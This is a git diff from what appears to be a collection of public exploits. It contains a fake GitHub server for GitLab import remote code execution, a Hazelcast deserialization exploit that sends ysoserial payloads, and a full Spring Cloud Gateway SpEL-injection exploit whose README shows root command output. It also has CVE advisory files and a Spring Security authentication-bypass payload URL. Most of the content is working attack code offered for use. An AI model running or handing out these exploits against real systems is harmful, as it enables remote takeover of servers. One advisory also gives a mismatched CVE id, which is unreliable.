-        b'0008NAK\n0023\x02Enumerating objects: 3, done.\n0022\x02Counting objects:  33% (1/3)\r0022\x02Counting objects:  66% (2/3)\r0022\x02Counting objects: 100% (3/3)\r0029\x02Counting objects: 100% (3/3), done.\n0265\x01PACK\x00\x00\x00\x02\x00\x00\x00\x03\x9a(x\x9cmR\xcbn\xa3@\x00\xbb\xf3\x15sG\xdb0\xbc\x91\xdaUg(\x05\xb6\xc9\x00i\x08io<\xc20\x84Gx\x87|\xfdv\xb7\xd7\xfaf\xcb\x96,\xd9c\x7f>\x83L\xceu\xa8\xa5\x9a\x90\xe6\xb9\x9e\xe7R\x92&r\x96f\x86b\x18\x8a.\xe6\xb1\n\xb3\x14\x8a9\xe4\xe2i,\xda\x1eD\xac\xaaX\\\x03\xdc.\x15k(x\\\xbe\x84\xe7%\xf9\xa6\x0f\xac\xc9\xdb\xdf\x00\xaa*\x94d(+*\xe0\xa1 \x08\\\xda\xd65\x1b\xc7s\x0fl6:S\x02\x1e\x9b\xb6?_\xab\xf5\x99\xb2\xb1\x98\x92\x87/\xc3\x0f1z\xa5\x03\xa3\xe0\xd7?`\xcbv\t\xf0m\x1f\xbc\xbb6A\x87po\xfd\xd79\xc0\x81e\xc0)F\x08\x9b\x08\x058\xf8Sb\xaa\x07\xe6\x1e\xbfiE){\xb3\xd4\xbb\x0bB3\r\\\xe4t\xcb\x1b\xcd\xd96W\xeac\xfe\x11\xdb\x05\x9f\xbdB\xbe\xe3\x80"\xd2H\x8f\x8e\xcc\xa4:\xf9\xdct\xc3\x88Y\xa8_.\xa7tht\xb5B\xa8\x13\x96\n\x1f\xe4jt\xe1\xea\xf9\x1f\xbcVf7\x85\x85\xe3\xb1\xd9\x96\xedHt\x0e\xd8\xd7y\x8b\xe4\xcfY\xd4\x93\xbb\xb8\xf9\x14=\xff\x10D)\x8e\x87Lz\xado\xeb2m2\xe8\xf4W\x8a\x02\xc2\xf6u\x946\xcb\xf5\xd4C\xcb\xb6\xadN%\xd3]\xe5@:%\x1a\x81\xea\xbe\xc6\xd4\x98\x1a\xf1\x8f\xb4+w\x06,nf\xca*\x1a\x94+\xf3\xa2\xb5U\xc5\xa3\x7f\xaaH\x1b_\xc2;<\x1en\x1bB\x19\xcd\xb2\xc5\xe0\'\x0e\x08\xda\x18#\'\xf7/\xba\xb5\xa7\x86\xe0\xf1\xb50k\xc7\x9btK\xca\xb3I\x82\xa2\x08\xe7]%\r}7\xedb=\x0cO\xd8\x94}{%\xfd\xee\xfdP\xdd\xed\xac\xfe\xea\x80\xcd\x8b\xcb\xb7y\xbd\xf3\xb2\xaaQ\xd8@\xf8\xed\xac+\x92_F\xd2^v\x9c\xd4\x14\xca"\xac?\xae\x9b;I\xf9\xd5|K$\xcd\xec^\xc6\xc0\tm\xabFO\x1cx\xf2\x02\xe9\x95\xfb\xde\xcc"/?/\xc6\xb9\r\x1bY\\\x81\xefc\xfc\x05\xc7\xd4\xcb\x13\xa5\x02x\x9c340031Q\x08rut\xf1u\xd5\xcbMa8\x96\x983g{\xab\xdfn\x86\xe6\xe7\xc2\xd9fo\x9f~\x7f\x94\xe5\x04\x00\xe1!\x0e\xe6=x\x9cSV((M\xca\xc9L\xe6JLL\xe4\x02\x00\x1c^\x03\xfa\xd2_\xcc\xa1\xa6\x81\xa3\xb6\xeeSL\x96\t\x0c\xb4\xf8\xb7>\xa90006\x01\xf8003a\x02Total 3 (delta 0), reused 0 (delta 0), pack-reused 0\n0000',
-        200,
-        {"Content-Type": "application/x-git-upload-pack-result"},
-    )
-
-
-@app.before_request
-def log_request():
-    app.logger.debug("Request Path %s", request.path)
-    app.logger.debug("Request Data %s", request.data)
-    return None
-
-
-@app.route("/repositories/12345")
-def repo():
-    return jsonify(REPO_JSON)
-
-
-@app.route("/api/v3/repositories/12345")
-def repo_legacy():
-    return jsonify(REPO_JSON)
-
-
-@app.route("/api/v3/repos/fake/name")
-def repo_info():
-    return jsonify(
-        {
-            "default_branch": {
-                "to_s": {
-                    "to_s": PAYLOAD,
-                    "bytesize": 3,
-                }
-            }
-        }
-    )
-
-
-@app.route("/api/v3/rate_limit")
-def rate_limit():
-    return (
-        jsonify({}),
-        200,
-        {"X-RateLimit-Limit": "100000", "X-RateLimit-Remaining": "100000"},
-    )
-
-
-@app.route("/", defaults={"path": ""}, methods=HTTP_METHODS)
-@app.route("/<path:path>", methods=HTTP_METHODS)
-def proxy(path):
-    return jsonify({})
+from flask import Flask, request, Response, send_file, jsonify
+import requests
+import json
+# Made by vakzz
+HTTP_METHODS = [
+    "GET",
+    "HEAD",
+    "POST",
+    "PUT",
+    "DELETE",
+    "CONNECT",
+    "OPTIONS",
+    "TRACE",
+    "PATCH",
+]
+app = Flask(__name__)
+
+# NOTE: Update these 2 variables
+PAYLOAD = ''
+NGROK_URL = ''
+
+
+REPO_JSON = {
+    "id": 12345,
+    "name": "fake",
+    "full_name": "fake/name",
+    "clone_url": NGROK_URL + "/vakzz/public.git",
+}
+
+
+@app.route("/vakzz/public.git/info/refs")
+def git_refs():
+    return (
+        b"001e# service=git-upload-pack\n00000154b5e17b851383bcee012364d0df7b67a3c4797b73 HEAD\x00multi_ack thin-pack side-band side-band-64k ofs-delta shallow deepen-since deepen-not deepen-relative no-progress include-tag multi_ack_detailed allow-tip-sha1-in-want allow-reachable-sha1-in-want no-done symref=HEAD:refs/heads/main filter object-format=sha1 agent=git/github-g04ce7e352669\n003db5e17b851383bcee012364d0df7b67a3c4797b73 refs/heads/main\n0000",
+        200,
+        {"Content-Type": "application/x-git-upload-pack-advertisement"},
+    )
+
+
+@app.route("/vakzz/public.git/git-upload-pack", methods=["POST"])
+def git_pack():
+    return (
+        b'0008NAK\n0023\x02Enumerating objects: 3, done.\n0022\x02Counting objects:  33% (1/3)\r0022\x02Counting objects:  66% (2/3)\r0022\x02Counting objects: 100% (3/3)\r0029\x02Counting objects: 100% (3/3), done.\n0265\x01PACK\x00\x00\x00\x02\x00\x00\x00\x03\x9a(x\x9cmR\xcbn\xa3@\x00\xbb\xf3\x15sG\xdb0\xbc\x91\xdaUg(\x05\xb6\xc9\x00i\x08io<\xc20\x84Gx\x87|\xfdv\xb7\xd7\xfaf\xcb\x96,\xd9c\x7f>\x83L\xceu\xa8\xa5\x9a\x90\xe6\xb9\x9e\xe7R\x92&r\x96f\x86b\x18\x8a.\xe6\xb1\n\xb3\x14\x8a9\xe4\xe2i,\xda\x1eD\xac\xaaX\\\x03\xdc.\x15k(x\\\xbe\x84\xe7%\xf9\xa6\x0f\xac\xc9\xdb\xdf\x00\xaa*\x94d(+*\xe0\xa1 \x08\\\xda\xd65\x1b\xc7s\x0fl6:S\x02\x1e\x9b\xb6?_\xab\xf5\x99\xb2\xb1\x98\x92\x87/\xc3\x0f1z\xa5\x03\xa3\xe0\xd7?`\xcbv\t\xf0m\x1f\xbc\xbb6A\x87po\xfd\xd79\xc0\x81e\xc0)F\x08\x9b\x08\x058\xf8Sb\xaa\x07\xe6\x1e\xbfiE){\xb3\xd4\xbb\x0bB3\r\\\xe4t\xcb\x1b\xcd\xd96W\xeac\xfe\x11\xdb\x05\x9f\xbdB\xbe\xe3\x80"\xd2H\x8f\x8e\xcc\xa4:\xf9\xdct\xc3\x88Y\xa8_.\xa7tht\xb5B\xa8\x13\x96\n\x1f\xe4jt\xe1\xea\xf9\x1f\xbcVf7\x85\x85\xe3\xb1\xd9\x96\xedHt\x0e\xd8\xd7y\x8b\xe4\xcfY\xd4\x93\xbb\xb8\xf9\x14=\xff\x10D)\x8e\x87Lz\xado\xeb2m2\xe8\xf4W\x8a\x02\xc2\xf6u\x946\xcb\xf5\xd4C\xcb\xb6\xadN%\xd3]\xe5@:%\x1a\x81\xea\xbe\xc6\xd4\x98\x1a\xf1\x8f\xb4+w\x06,nf\xca*\x1a\x94+\xf3\xa2\xb5U\xc5\xa3\x7f\xaaH\x1b_\xc2;<\x1en\x1bB\x19\xcd\xb2\xc5\xe0\'\x0e\x08\xda\x18#\'\xf7/\xba\xb5\xa7\x86\xe0\xf1\xb50k\xc7\x9btK\xca\xb3I\x82\xa2\x08\xe7]%\r}7\xedb=\x0cO\xd8\x94}{%\xfd\xee\xfdP\xdd\xed\xac\xfe\xea\x80\xcd\x8b\xcb\xb7y\xbd\xf3\xb2\xaaQ\xd8@\xf8\xed\xac+\x92_F\xd2^v\x9c\xd4\x14\xca"\xac?\xae\x9b;I\xf9\xd5|K$\xcd\xec^\xc6\xc0\tm\xabFO\x1cx\xf2\x02\xe9\x95\xfb\xde\xcc"/?/\xc6\xb9\r\x1bY\\\x81\xefc\xfc\x05\xc7\xd4\xcb\x13\xa5\x02x\x9c340031Q\x08rut\xf1u\xd5\xcbMa8\x96\x983g{\xab\xdfn\x86\xe6\xe7\xc2\xd9fo\x9f~\x7f\x94\xe5\x04\x00\xe1!\x0e\xe6=x\x9cSV((M\xca\xc9L\xe6JLL\xe4\x02\x00\x1c^\x03\xfa\xd2_\xcc\xa1\xa6\x81\xa3\xb6\xeeSL\x96\t\x0c\xb4\xf8\xb7>\xa90006\x01\xf8003a\x02Total 3 (delta 0), reused 0 (delta 0), pack-reused 0\n0000',
+        200,
+        {"Content-Type": "application/x-git-upload-pack-result"},
+    )
+
+
+@app.before_request
+def log_request():
+    app.logger.debug("Request Path %s", request.path)
+    app.logger.debug("Request Data %s", request.data)
+    return None
+
+
+@app.route("/repositories/12345")
+def repo():
+    return jsonify(REPO_JSON)
+
+
+@app.route("/api/v3/repositories/12345")
+def repo_legacy():
+    return jsonify(REPO_JSON)
+
+
+@app.route("/api/v3/repos/fake/name")
+def repo_info():
+    return jsonify(
+        {
+            "default_branch": {
+                "to_s": {
+                    "to_s": PAYLOAD,
+                    "bytesize": 3,
+                }
+            }
+        }
+    )
+
+
+@app.route("/api/v3/rate_limit")
+def rate_limit():
+    return (
+        jsonify({}),
+        200,
+        {"X-RateLimit-Limit": "100000", "X-RateLimit-Remaining": "100000"},
+    )
+
+
+@app.route("/", defaults={"path": ""}, methods=HTTP_METHODS)
+@app.route("/<path:path>", methods=HTTP_METHODS)
+def proxy(path):
+    return jsonify({})
diff --git a/cve/gitlab/2022/yaml/CVE-2022-2992.yaml b/cve/gitlab/2022/yaml/CVE-2022-2992.yaml
index 4600a13b..531d568c 100644
--- a/cve/gitlab/2022/yaml/CVE-2022-2992.yaml
+++ b/cve/gitlab/2022/yaml/CVE-2022-2992.yaml
@@ -1,27 +1,27 @@
-id: CVE-2022-2992
-source: https://github.com/CsEnox/CVE-2022-2992
-info:
-  name: GitLab是由GitLab Inc.开发，一款基于Git的完全集成的软件开发平台。
-  severity: critical
-  description: |
-    A vulnerability in GitLab CE/EE affecting all versions from 11.10 prior to 15.1.6, 15.2 to 15.2.4, 15.3 to 15.3.2 allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint.
-  scope-of-influence:
-    11.10 <= GitLab（CE/EE）< 15.1.6
-    15.2 <= GitLab（CE/EE）< 15.2.4
-    15.3 <= GitLab（CE/EE）< 15.3.2
-  reference:
-    - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2992.json
-    - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2992.json
-    - http://packetstormsecurity.com/files/171008/GitLab-GitHub-Repo-Import-Deserialization-Remote-Code-Execution.html
-    - https://gitlab.com/gitlab-org/gitlab/-/issues/371884
-    - https://gitlab.com/gitlab-org/gitlab/-/issues/371884
-    - https://hackerone.com/reports/1679624
-    - https://hackerone.com/reports/1679624
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 9.9
-    cve-id: CVE-2022-2292
-    cwe-id: CWE-77
-    cnvd-id: None
-    kve-id: None
+id: CVE-2022-2992
+source: https://github.com/CsEnox/CVE-2022-2992
+info:
+  name: GitLab是由GitLab Inc.开发，一款基于Git的完全集成的软件开发平台。
+  severity: critical
+  description: |
+    A vulnerability in GitLab CE/EE affecting all versions from 11.10 prior to 15.1.6, 15.2 to 15.2.4, 15.3 to 15.3.2 allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint.
+  scope-of-influence:
+    11.10 <= GitLab（CE/EE）< 15.1.6
+    15.2 <= GitLab（CE/EE）< 15.2.4
+    15.3 <= GitLab（CE/EE）< 15.3.2
+  reference:
+    - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2992.json
+    - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2992.json
+    - http://packetstormsecurity.com/files/171008/GitLab-GitHub-Repo-Import-Deserialization-Remote-Code-Execution.html
+    - https://gitlab.com/gitlab-org/gitlab/-/issues/371884
+    - https://gitlab.com/gitlab-org/gitlab/-/issues/371884
+    - https://hackerone.com/reports/1679624
+    - https://hackerone.com/reports/1679624
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 9.9
+    cve-id: CVE-2022-2292
+    cwe-id: CWE-77
+    cnvd-id: None
+    kve-id: None
   tags: cve2022, gitlab
\ No newline at end of file
diff --git a/cve/hazelcast/2022/CVE-2022-0265/CVE-2022-0265.py b/cve/hazelcast/2022/CVE-2022-0265/CVE-2022-0265.py
index a7fac033..856961aa 100644
--- a/cve/hazelcast/2022/CVE-2022-0265/CVE-2022-0265.py
+++ b/cve/hazelcast/2022/CVE-2022-0265/CVE-2022-0265.py
@@ -1,32 +1,32 @@
-import socket
-import threading
-import time
-import sys
-import os
-groupName = b""
-clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-def socketRecv(clientSocket):
-    global groupName
-    while(1):
-        groupName += clientSocket.recv(1024)
-if __name__ == '__main__':
-
-    ip = sys.argv[1]
-    payloadType = sys.argv[2]
-    payload = sys.argv[3]
-
-    os.system(f"java -jar ysoserial.jar {payloadType} {payload} > 1.ser")
-    print(f"java -jar ysoserial.jar {payloadType} {payload} > 1.ser")
-    clientSocket.connect((ip, 5701))
-    obj1 = threading.Thread(target=socketRecv ,args=(clientSocket,))
-    obj1.start()
-    file = open("1.ser", 'rb')
-    filebyte = file.read()
-    print(filebyte)
-    
-    print("输入 send 发送payload")
-    if(input("INPUT:")=="send"):
-        print(groupName)
-        clientSocket.send(groupName+b"\xFF\xFF\xFF\x9C"+filebyte)
-    time.sleep(10)
-    clientSocket.close()
+import socket
+import threading
+import time
+import sys
+import os
+groupName = b""
+clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+def socketRecv(clientSocket):
+    global groupName
+    while(1):
+        groupName += clientSocket.recv(1024)
+if __name__ == '__main__':
+
+    ip = sys.argv[1]
+    payloadType = sys.argv[2]
+    payload = sys.argv[3]
+
+    os.system(f"java -jar ysoserial.jar {payloadType} {payload} > 1.ser")
+    print(f"java -jar ysoserial.jar {payloadType} {payload} > 1.ser")
+    clientSocket.connect((ip, 5701))
+    obj1 = threading.Thread(target=socketRecv ,args=(clientSocket,))
+    obj1.start()
+    file = open("1.ser", 'rb')
+    filebyte = file.read()
+    print(filebyte)
+    
+    print("输入 send 发送payload")
+    if(input("INPUT:")=="send"):
+        print(groupName)
+        clientSocket.send(groupName+b"\xFF\xFF\xFF\x9C"+filebyte)
+    time.sleep(10)
+    clientSocket.close()
diff --git a/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/README.md b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/README.md
index d744b0b8..2276b740 100644
--- a/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/README.md
+++ b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/README.md
@@ -1,44 +1,44 @@
-# Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)
-###### CVE: CVE-2022-22947 
-###### CVSS: 10.0 (Vmware - https://tanzu.vmware.com/security/cve-2022-22947)
-###### Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.
-
-
-#### Usage
-```sh
-git clone https://github.com/carlosevieira/CVE-2022-22947
-cd CVE-2022-22947
-pip3 install -r requirements.txt
-python3 exploit.py http://target 'id'
-```
-
-```sh
-john@doe:~/exploit/CVE-2022-22947/$ python3 exploit.py http://localhost:8080 'id'
-
-    ###################################################
-    #                                                 #
-    #   Exploit for CVE-2022-22947                    #
-    #   - Carlos Vieira (Crowsec)                     #
-    #                                                 #
-    #   Usage:                                        #
-    #   python3 exploit.py <url> <command>            #
-    #                                                 #
-    #   Example:                                      #
-    #   python3 exploit.py http://localhost:8080 'id' #
-    #                                                 #
-    ###################################################
-    
-[+] Stage deployed to /actuator/gateway/routes/rtxhovup
-[+] Executing command...
-[+] getting result...
-[+] Stage removed!
-uid=0(root) gid=0(root) groups=0(root)
-```
-
-#### References
-
-https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/
-
-https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published
-
+# Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)
+###### CVE: CVE-2022-22947 
+###### CVSS: 10.0 (Vmware - https://tanzu.vmware.com/security/cve-2022-22947)
+###### Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.
+
+
+#### Usage
+```sh
+git clone https://github.com/carlosevieira/CVE-2022-22947
+cd CVE-2022-22947
+pip3 install -r requirements.txt
+python3 exploit.py http://target 'id'
+```
+
+```sh
+john@doe:~/exploit/CVE-2022-22947/$ python3 exploit.py http://localhost:8080 'id'
+
+    ###################################################
+    #                                                 #
+    #   Exploit for CVE-2022-22947                    #
+    #   - Carlos Vieira (Crowsec)                     #
+    #                                                 #
+    #   Usage:                                        #
+    #   python3 exploit.py <url> <command>            #
+    #                                                 #
+    #   Example:                                      #
+    #   python3 exploit.py http://localhost:8080 'id' #
+    #                                                 #
+    ###################################################
+    
+[+] Stage deployed to /actuator/gateway/routes/rtxhovup
+[+] Executing command...
+[+] getting result...
+[+] Stage removed!
+uid=0(root) gid=0(root) groups=0(root)
+```
+
+#### References
+
+https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/
+
+https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published
+
 https://tanzu.vmware.com/security/cve-2022-22947
\ No newline at end of file
diff --git a/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/exploit.py b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/exploit.py
index 953f4759..d7e2b150 100644
--- a/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/exploit.py
+++ b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/exploit.py
@@ -1,76 +1,76 @@
-import random
-import string
-import requests
-import json
-import sys
-import urllib.parse
-import base64
-import urllib3
-urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
-
-headers = { "Content-Type": "application/json" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'}
-
-id = ''.join(random.choice(string.ascii_lowercase) for i in range(8))
-
-def exploit(url, command):
-    
-    payload = { "id": id, "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\u0022"+command+"\u0022).getInputStream()))}"}}],"uri": "http://example.com"}
-    
-    rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), verify=False)
-    if(rbase.status_code == 201):
-        print("[+] Stage deployed to /actuator/gateway/routes/"+id)
-        print("[+] Executing command...")
-        r = requests.post(url + '/actuator/gateway/refresh', headers=headers, verify=False)
-        if(r.status_code == 200):
-            print("[+] getting result...")
-            r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False)
-            if(r.status_code == 200):
-                get_response = r.json()
-                clean(url, id)
-                return get_response['filters'][0].split("'")[1]
-            else:
-                print("[-] Error: Invalid response")
-                clean(url, id)
-                exit(1)
-        else:
-            clean(url, id)
-            print("[-] Error executing command")
-    else:
-        print("[X] Error: Fail to deploy stage (Patched ?)")
-        exit(1)
-    
-def clean(url, id):
-    remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False)
-    if(remove.status_code == 200):
-        print("[+] Stage removed!")
-    else:
-        print("[-] Error: Fail to remove stage")
-
-def banner():
-    print("""
-    ###################################################
-    #                                                 #
-    #   Exploit for CVE-2022-22947                    #
-    #   - Carlos Vieira (Crowsec)                     #
-    #                                                 #
-    #   Usage:                                        #
-    #   python3 exploit.py <url> <command>            #
-    #                                                 #
-    #   Example:                                      #
-    #   python3 exploit.py http://localhost:8080 'id' #
-    #                                                 #
-    ###################################################
-    """)
-
-def main():
-    banner()
-    if len(sys.argv) != 3:
-        print("[-] Error: Invalid arguments")
-        print("[-] Usage: python3 exploit.py <url> <command>")
-        exit(1)
-    else:
-        url = sys.argv[1]
-        command = sys.argv[2]
-        print(exploit(url, command))
-if __name__ == '__main__':
+import random
+import string
+import requests
+import json
+import sys
+import urllib.parse
+import base64
+import urllib3
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+headers = { "Content-Type": "application/json" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'}
+
+id = ''.join(random.choice(string.ascii_lowercase) for i in range(8))
+
+def exploit(url, command):
+    
+    payload = { "id": id, "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\u0022"+command+"\u0022).getInputStream()))}"}}],"uri": "http://example.com"}
+    
+    rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), verify=False)
+    if(rbase.status_code == 201):
+        print("[+] Stage deployed to /actuator/gateway/routes/"+id)
+        print("[+] Executing command...")
+        r = requests.post(url + '/actuator/gateway/refresh', headers=headers, verify=False)
+        if(r.status_code == 200):
+            print("[+] getting result...")
+            r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False)
+            if(r.status_code == 200):
+                get_response = r.json()
+                clean(url, id)
+                return get_response['filters'][0].split("'")[1]
+            else:
+                print("[-] Error: Invalid response")
+                clean(url, id)
+                exit(1)
+        else:
+            clean(url, id)
+            print("[-] Error executing command")
+    else:
+        print("[X] Error: Fail to deploy stage (Patched ?)")
+        exit(1)
+    
+def clean(url, id):
+    remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False)
+    if(remove.status_code == 200):
+        print("[+] Stage removed!")
+    else:
+        print("[-] Error: Fail to remove stage")
+
+def banner():
+    print("""
+    ###################################################
+    #                                                 #
+    #   Exploit for CVE-2022-22947                    #
+    #   - Carlos Vieira (Crowsec)                     #
+    #                                                 #
+    #   Usage:                                        #
+    #   python3 exploit.py <url> <command>            #
+    #                                                 #
+    #   Example:                                      #
+    #   python3 exploit.py http://localhost:8080 'id' #
+    #                                                 #
+    ###################################################
+    """)
+
+def main():
+    banner()
+    if len(sys.argv) != 3:
+        print("[-] Error: Invalid arguments")
+        print("[-] Usage: python3 exploit.py <url> <command>")
+        exit(1)
+    else:
+        url = sys.argv[1]
+        command = sys.argv[2]
+        print(exploit(url, command))
+if __name__ == '__main__':
     main()
\ No newline at end of file
diff --git a/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml b/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml
index 21923f43..281211f2 100644
--- a/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml
+++ b/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml
@@ -1,22 +1,22 @@
-id: CVE-2022-22947
-source: 
-  https://github.com/crowsec-edtech/CVE-2022-22947
-info:
-  name: Spring Cloud Gateway 是 Spring Cloud 的一个全新项目，该项目是基于 Spring 5.0，Spring Boot 2.0 和 Project Reactor 等技术开发的网关，它旨在为微服务架构提供一种简单有效的统一的 API 路由管理方式。
-  severity: critical
-  description: |
-    Spring Cloud Gateway存在远程代码执行漏洞，该漏洞是发生在Spring Cloud Gateway应用程序的Actuator端点，其在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可利用该漏洞通过恶意创建允许在远程主机上执行任意远程请求。
-  scope-of-influence:
-    Spring Cloud GateWay 3.1.0
-    Spring Cloud GateWay >=3.0.0, <=3.0.6
-    Spring Cloud GateWay <3.0.0
-  reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-22947
-  classification:
-    cvss-metrics:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.0
-    cve-id: CVE-2022-22947
-    cwe-id: CWE-94
-    cnvd-id: None
-    kve-id: None
+id: CVE-2022-22947
+source: 
+  https://github.com/crowsec-edtech/CVE-2022-22947
+info:
+  name: Spring Cloud Gateway 是 Spring Cloud 的一个全新项目，该项目是基于 Spring 5.0，Spring Boot 2.0 和 Project Reactor 等技术开发的网关，它旨在为微服务架构提供一种简单有效的统一的 API 路由管理方式。
+  severity: critical
+  description: |
+    Spring Cloud Gateway存在远程代码执行漏洞，该漏洞是发生在Spring Cloud Gateway应用程序的Actuator端点，其在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可利用该漏洞通过恶意创建允许在远程主机上执行任意远程请求。
+  scope-of-influence:
+    Spring Cloud GateWay 3.1.0
+    Spring Cloud GateWay >=3.0.0, <=3.0.6
+    Spring Cloud GateWay <3.0.0
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-22947
+  classification:
+    cvss-metrics:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cve-id: CVE-2022-22947
+    cwe-id: CWE-94
+    cnvd-id: None
+    kve-id: None
   tags: cve2022, spring-cloud-gateway
\ No newline at end of file
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/.gitignore b/cve/java-spring-security/2022/CVE-2022-22978/.gitignore
new file mode 100644
index 00000000..589f69dd
--- /dev/null
+++ b/cve/java-spring-security/2022/CVE-2022-22978/.gitignore
@@ -0,0 +1,58 @@
+HELP.md
+target/
+!.mvn/wrapper/maven-wrapper.jar
+!**/src/main/**/target/
+!**/src/test/**/target/
+
+### STS ###
+.apt_generated
+.classpath
+.factorypath
+.project
+.settings
+.springBeans
+.sts4-cache
+
+### IntelliJ IDEA ###
+.idea
+*.iws
+*.iml
+*.ipr
+
+### NetBeans ###
+/nbproject/private/
+/nbbuild/
+/dist/
+/nbdist/
+/.nb-gradle/
+build/
+!**/src/main/**/build/
+!**/src/test/**/build/
+
+### VS Code ###
+.vscode/
+### Java template
+# Compiled class file
+*.class
+
+# Log file
+*.log
+
+# BlueJ files
+*.ctxt
+
+# Mobile Tools for Java (J2ME)
+.mtj.tmp/
+
+# Package Files #
+*.jar
+*.war
+*.nar
+*.ear
+*.zip
+*.tar.gz
+*.rar
+
+# virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml
+hs_err_pid*
+
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/.mvn/wrapper/maven-wrapper.properties b/cve/java-spring-security/2022/CVE-2022-22978/.mvn/wrapper/maven-wrapper.properties
new file mode 100644
index 00000000..b7cb93e7
--- /dev/null
+++ b/cve/java-spring-security/2022/CVE-2022-22978/.mvn/wrapper/maven-wrapper.properties
@@ -0,0 +1,2 @@
+distributionUrl=https://repo.maven.apache.org/maven2/org/apache/maven/apache-maven/3.8.4/apache-maven-3.8.4-bin.zip
+wrapperUrl=https://repo.maven.apache.org/maven2/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/Dockerfile b/cve/java-spring-security/2022/CVE-2022-22978/Dockerfile
new file mode 100644
index 00000000..f7771d2f
--- /dev/null
+++ b/cve/java-spring-security/2022/CVE-2022-22978/Dockerfile
@@ -0,0 +1,5 @@
+FROM openjdk:8-jdk-alpine
+MAINTAINER S0cke3t
+EXPOSE 8080
+ADD target/CVE-2022-22978-0.0.1-SNAPSHOT.jar demo.jar
+ENTRYPOINT exec java -jar /demo.jar
\ No newline at end of file
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/README.md b/cve/java-spring-security/2022/CVE-2022-22978/README.md
new file mode 100644
index 00000000..d73d4d3c
--- /dev/null
+++ b/cve/java-spring-security/2022/CVE-2022-22978/README.md
@@ -0,0 +1,12 @@
+### CVE-2022-22978 Spring-Security bypass Demo  
+>在Spring Security中使用RegexRequestMatcher且规则中包含带点号的正则表达式时，攻击者可以通过构造恶意数据包绕过身份认证  
+### 影响范围  
+>Spring Security 5.5.x < 5.5.7  
+Spring Security 5.6.x < 5.6.4
+### 复现
+![img.png](img.png)
+![img_1.png](img_1.png)
+### Paylaod
+>http://localhost:8080/admin/index%0a
+### Docker
+> docker pull s0cke3t/cve-2022-22978:latest
\ No newline at end of file
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/img.png b/cve/java-spring-security/2022/CVE-2022-22978/img.png
new file mode 100644
index 0000000000000000000000000000000000000000..3cd0812251ae3e69ff81e7180dd78659ba1ff3ec
GIT binary patch
literal 41580
